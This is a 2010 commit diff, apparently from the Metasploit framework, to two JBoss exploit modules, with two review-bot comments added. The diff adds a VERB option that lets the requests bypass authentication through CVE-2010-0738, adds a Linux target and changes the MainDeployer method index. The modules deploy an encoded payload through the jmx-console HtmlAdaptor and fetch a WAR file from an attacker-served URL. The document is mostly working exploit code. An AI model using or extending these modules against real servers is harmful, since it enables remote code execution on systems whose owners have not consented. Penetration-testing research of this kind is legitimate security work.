add VERB option to enable exploiting cve-2010-0738

git-svn-id: file:///home/svn/framework3/trunk@9282 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-11 09:14:36 +00:00
parent c0494dcbc0
commit 7f758d5a02
2 changed files with 23 additions and 9 deletions


@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2006-5750' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '30767'],
[ 'BID', '21219' ]
],
@ -57,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
OptString.new('URI', [ true, "The URI to call the payload.", '/web-console/']),
OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/'])
OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']),
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
], self.class)
end
@ -68,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'method' => 'POST',
'method' => datastore['VERB'],
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
})
if (res.code == 200)
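Review bot: `res` is dereferenced at `if (res.code == 200)` with no nil guard, and send_request_cgi returns nil when no response arrives (timeout or dropped connection). The method now comes from the operator-set `VERB` option instead of a fixed POST, so a non-response may be more likely than before. In that case the module stops with a NoMethodError instead of a clear status message. Guard the check as `if (res and res.code == 200)` and report the no-response case separately. The body of this `if` and the rest of the method lie outside the hunk.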


@ -34,11 +34,12 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2007-1036' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '33744' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
],
'Privileged' => true,
'Platform' => [ 'win' ], # linux untested
'Platform' => [ 'win', 'linux' ], # linux untested
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
@ -55,6 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
]
],
'DefaultTarget' => 0))
@ -64,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console'])
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']),
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']),
], self.class)
end
@ -140,15 +148,19 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Path' => resource_uri
}})
print_status("Making the request to the MainDeployer...")
res = send_request_cgi({
'method' => 'POST',
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
'methodIndex' => '21', # deploy via java.net.URL
# deploy via java.net.URL
'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
}, 20)
@ -199,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => 'POST',
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
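Review bot: The hard-coded `'methodIndex'` in the MainDeployer request changes from '21' to '3' here, which the commit title (adding the VERB option) does not mention and which changes behaviour for anyone relying on the previous value. The other values are left behind as commented-out lines, so a maintainer has to read dead code to learn which index applies where. I would move this change to its own commit and replace the commented-out lines with one explanatory comment, e.g. `# operation index varies by JBoss release; '3' is the value noted for 4.0.5`. The request hash and its enclosing method start and end outside the visible hunks.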